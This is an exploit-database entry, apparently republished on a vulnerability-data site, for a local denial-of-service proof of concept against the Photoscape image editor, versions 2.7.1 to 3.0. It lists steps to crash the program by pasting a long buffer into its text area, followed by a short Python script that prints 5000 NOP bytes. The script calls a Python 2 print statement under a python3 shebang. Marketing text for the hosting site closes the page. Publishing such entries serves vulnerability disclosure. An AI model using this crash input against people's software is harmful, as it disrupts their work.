`# Exploit Title: Photoscape 2.7.1 < 3.0 - 'Textarea' Denial of Service
(PoC)
# Author: HexraiN
# Date: 2020-04-10
# Vendor Homepage: http://www.photoscape.org/
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Parrot OS , Windows 10
Steps to Produce the Crash:
1.- Run Python Exploit
2.- Copy output to clipboard
3.- Open Photoscape
4.- Select Any image
5.- Go To Menu > Object and select Create
6.- Paste ClipBoard on "Textarea"
7.- Crashed..
PoC :
#!/usr/bin/python3
buf = ""
buf += "\x90"*5000
print buf
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation